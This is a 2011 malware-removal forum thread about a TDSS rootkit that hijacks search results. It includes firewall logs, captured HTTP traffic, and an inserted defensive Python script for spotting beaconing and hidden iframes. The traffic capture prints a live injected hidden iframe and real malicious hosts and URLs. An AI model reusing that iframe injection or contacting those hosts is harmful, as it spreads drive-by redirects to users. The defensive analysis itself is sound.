techiegirlwithsearchresvir Posted June 18, 2011 ID:442638

All, I seem to have the same issue. Malwarebytes' Anti-Malware is detecting the svchost process attempting IP connects to 91.212.226.6 when Firefox is not running, and other IPs when Firefox is running. Also, when I search in the Bing search textbox or Firefox's Google search text box, in either Internet Explorer or Firefox, respectively, and I click on the search result, it goes to other sites other than the original link. I checked the network tool part of Firefox 4, and it shows the routes in the following log. Malwarebytes' Anti-Malware did not detect it with version ~6879 today, nor did it detect anything when I tried a few days ago. I just updated to 6885 and am trying again. A few days ago, I tried running ComboFix but it only deleted things in archive zip files and a java scheduler. May you please help me too? Should I open a new topic?

Malwarebytes' Anti-Malware log:

09:50:03 Diane IP-BLOCK 199.238.181.201 (Type: outgoing, Port: 55264, Process: firefox.exe)
09:50:03 Diane IP-BLOCK 199.238.181.201 (Type: outgoing, Port: 55265, Process: firefox.exe)
09:50:03 Diane IP-BLOCK 199.238.181.201 (Type: outgoing, Port: 55266, Process: firefox.exe)
09:50:03 Diane IP-BLOCK 199.238.181.201 (Type: outgoing, Port: 55267, Process: firefox.exe)
09:50:03 Diane IP-BLOCK 199.238.181.201 (Type: outgoing, Port: 55268, Process: firefox.exe)
09:50:03 Diane IP-BLOCK 199.238.181.201 (Type: outgoing, Port: 55269, Process: firefox.exe)
09:50:03 Diane IP-BLOCK 199.238.181.201 (Type: outgoing, Port: 55270, Process: firefox.exe)
09:50:03 Diane IP-BLOCK 199.238.181.201 (Type: outgoing, Port: 55271, Process: firefox.exe)
09:59:03 Diane IP-BLOCK 91.213.29.63 (Type: outgoing, Port: 55399, Process: firefox.exe)
09:59:03 Diane IP-BLOCK 188.95.52.161 (Type: outgoing, Port: 55400, Process: firefox.exe)
10:02:07 Diane IP-BLOCK 91.212.226.6 (Type: outgoing, Port: 55422, Process: svchost.exe)
10:32:33 Diane IP-BLOCK 91.212.226.6 (Type: outgoing, Port: 55591, Process: svchost.exe)
10:42:33 Diane IP-BLOCK 91.212.226.6 (Type: outgoing, Port: 55602, Process: svchost.exe)
12:54:20 Diane IP-BLOCK 91.212.226.6 (Type: outgoing, Port: 55735, Process: svchost.exe)
13:24:45 Diane IP-BLOCK 91.212.226.6 (Type: outgoing, Port: 55765, Process: svchost.exe)
13:34:45 Diane IP-BLOCK 91.212.226.6 (Type: outgoing, Port: 55777, Process: svchost.exe)

Clicking on the TextPad download search result, when I had "textpad download" in the search toolbar, spawns these HTTP requests:

PLEASE DON'T go to these URLs! THIS IS JUST FOR INFORMATIVE PURPOSES OF THE VIRUS.

[01:25:03.941] GET http://www.google.com/url?sa=t&source=web&cd=1&ved=0CBYQFjAA&url=http%3A%2F%2Fwww.textpad.com%2Fdownload%2F&rct=j&q=textpad%20download&ei=Wjb8Td-uDYTx0gHqmrjMAw&usg=AFQjCNENIlIsriJbDbX7pwA4aFqrwF1lWQ&sig2=kGnhU6eU4bvJl-Qxrz0aJg [HTTP/1.1 200 OK 34ms]
[01:25:03.994] GET http://www.textpad.com/download/ [HTTP/1.1 200 OK 135ms]
[01:25:04.166] GET http://ajrentals.com/default.pk?tsearch=textpad+download&search_button.x=0&search_button.y=0 [HTTP/1.1 200 OK 446ms]
[01:25:04.643] GET http://195.3.145.184/6Vm3c4LL7t5ytoc915399c4acfcba3b08dbfb662cfba8ca937h [undefined 11ms]

Request URL: http://www.textpad.com/download/
Request Method: GET
Status Code: HTTP/1.1 200 OK

Request Headers 01:25:04.018
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Connection: keep-alive
Host: www.textpad.com
Keep-Alive: 115
Referer: http://www.google.com/url?sa=t&source=web&cd=1&ved=0CBYQFjAA&url=http%3A%2F%2Fwww.textpad.com%2Fdownload%2F&rct=j&q=textpad%20download&ei=Wjb8Td-uDYTx0gHqmrjMAw&usg=AFQjCNENIlIsriJbDbX7pwA4aFqrwF1lWQ&sig2=kGnhU6eU4bvJl-Qxrz0aJg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1

Sent Cookie
__utnc: 1

Response Headers Δ135ms
Cache-Control: no-cache, no-store, must-revalidate
Connection: close
Content-Length: 143
Content-Type: text/html
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Set-Cookie: __utnc=1; expires=Sat, 18-Jun-2011 05:55:04 GMT

Response Body Δ0ms
<iframe src='http://ajrentals.com/default.pk?tsearch=textpad+download&search_button.x=0&search_button.y=0' style='visibility:hidden;'></iframe>
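The two artifacts in the post above, the Malwarebytes IP-BLOCK lines and the intercepted response carrying a hidden iframe, are exactly the kind of evidence a defender can triage with a few lines of code. The following is an added example, not code from the poster or from Malwarebytes: it parses IP-BLOCK lines in the format shown, flags non-browser processes that are repeatedly blocked reaching the same outbound IP (and reports recurring gaps between blocks, a hallmark of beaconing), and separately pulls the src of any iframe styled so the user cannot see it. The sample log and response body are constructed from the shapes shown in the post; the BROWSERS allow-list and the 5-second gap tolerance are my assumptions.

```python
import re
from collections import defaultdict

# Constructed sample log in the Malwarebytes IP-BLOCK line format shown in the post.
SAMPLE_LOG = """\
09:50:03 Diane IP-BLOCK 199.238.181.201 (Type: outgoing, Port: 55264, Process: firefox.exe)
09:59:03 Diane IP-BLOCK 91.213.29.63 (Type: outgoing, Port: 55399, Process: firefox.exe)
10:02:07 Diane IP-BLOCK 91.212.226.6 (Type: outgoing, Port: 55422, Process: svchost.exe)
10:32:33 Diane IP-BLOCK 91.212.226.6 (Type: outgoing, Port: 55591, Process: svchost.exe)
10:42:33 Diane IP-BLOCK 91.212.226.6 (Type: outgoing, Port: 55602, Process: svchost.exe)
12:54:20 Diane IP-BLOCK 91.212.226.6 (Type: outgoing, Port: 55735, Process: svchost.exe)
13:24:45 Diane IP-BLOCK 91.212.226.6 (Type: outgoing, Port: 55765, Process: svchost.exe)
13:34:45 Diane IP-BLOCK 91.212.226.6 (Type: outgoing, Port: 55777, Process: svchost.exe)
"""

# Constructed response body with the same shape as the one captured in the post.
SAMPLE_BODY = ("<iframe src='http://ajrentals.com/default.pk?tsearch=textpad+download"
               "&search_button.x=0&search_button.y=0' style='visibility:hidden;'></iframe>")

LINE_RE = re.compile(
    r"^(?P<time>\d{2}:\d{2}:\d{2}) (?P<user>\S+) IP-BLOCK (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) "
    r"\(Type: (?P<direction>\w+), Port: (?P<port>\d+), Process: (?P<proc>[^)]+)\)$"
)

# Assumed allow-list: processes expected to contact arbitrary web hosts.
BROWSERS = {"firefox.exe", "iexplore.exe", "chrome.exe"}


def to_seconds(hhmmss):
    h, m, s = (int(x) for x in hhmmss.split(":"))
    return h * 3600 + m * 60 + s


def parse_log(text):
    """Return one dict per well-formed IP-BLOCK line; malformed lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            d = m.groupdict()
            d["port"] = int(d["port"])
            d["t"] = to_seconds(d["time"])
            events.append(d)
    return events


def group_by_process_and_ip(events):
    groups = defaultdict(list)
    for e in events:
        groups[(e["proc"].lower(), e["ip"])].append(e["t"])
    return groups


def repeated_gaps(times, tol=5):
    """Gaps (seconds) between consecutive blocks that recur within `tol` seconds of each other."""
    gaps = sorted(b - a for a, b in zip(times, times[1:]))
    found = []
    for a, b in zip(gaps, gaps[1:]):
        if b - a <= tol and (not found or a - found[-1] > tol):
            found.append(a)
    return found


def suspicious_connections(events, browsers=BROWSERS):
    """Flag non-browser processes repeatedly blocked reaching the same outbound IP."""
    findings = []
    for (proc, ip), times in group_by_process_and_ip(events).items():
        if proc in browsers:
            continue
        findings.append({"proc": proc, "ip": ip, "count": len(times),
                         "periodic_gaps": repeated_gaps(sorted(times))})
    return findings


IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
SRC_RE = re.compile(r"""src\s*=\s*['"]([^'"]+)['"]""", re.IGNORECASE)
HIDDEN_RE = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.IGNORECASE)


def hidden_iframe_sources(html):
    """Return the src of every iframe styled so the user cannot see it."""
    return [SRC_RE.search(attrs).group(1)
            for attrs in IFRAME_RE.findall(html)
            if HIDDEN_RE.search(attrs) and SRC_RE.search(attrs)]


if __name__ == "__main__":
    for f in suspicious_connections(parse_log(SAMPLE_LOG)):
        print(f"{f['proc']} -> {f['ip']}: {f['count']} blocks, recurring gaps {f['periodic_gaps']}s")
    for src in hidden_iframe_sources(SAMPLE_BODY):
        print("hidden iframe loads", src)
```

On the constructed log the only finding is svchost.exe reaching 91.212.226.6 six times, with 600-second and roughly 1825-second gaps recurring; a system process beaconing to one external IP on a schedule, while the browser is closed, is the signal worth escalating. The iframe check is deliberately narrow (hidden by visibility or display only) so it does not fire on ordinary embedded content.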
techiegirlwithsearchresvir Posted June 19, 2011 Author ID:442994

I fixed this virus by researching it and finding a legitimate solution here. Anyone with the symptoms that I describe above, you probably have this Google search redirect virus. It is known as the TDSS virus. The cure solution is explained in this article. It refers to a trusted TDSSKiller.zip that removes this known rootkit virus, TDSSKiller. It was found on my OEM partition, not the C drive or registry files. The cure solution TDSSKiller.zip should detect this TDSS virus. Once executed, it shows the detected virus, with the option to "Cure". Click the Cure button to safely cure the virus. The article says not to delete or quarantine because it might be in valid Windows files.

Users, best of luck!

Malwarebytes' reps - you probably could put the same type of removal procedure for this rootkit TDSS virus in your ComboFix software. That would be the best of both worlds, right?

-Diane
LDTate Posted June 19, 2011 ID:443037

We do not recommend users run these tools without supervision. DO NOT use any TOOLS such as Combofix or HijackThis fixes without supervision. Doing so could make your PC inoperable and could require a full reinstall of your OS, losing all your programs and data. Same for TDSSKiller.

Note: if the Cure option is not there, please select 'Skip'.

The developers of Combofix and TDSSKiller are different parties.
LDTate Posted June 21, 2011 ID:443923

Glad we could help. If you need this topic reopened, please send a Private Message to any one of the moderating team members. Please include a link to this thread with your request. This applies only to the originator of this thread. Other members who need assistance please start your own topic in a new thread. Thanks!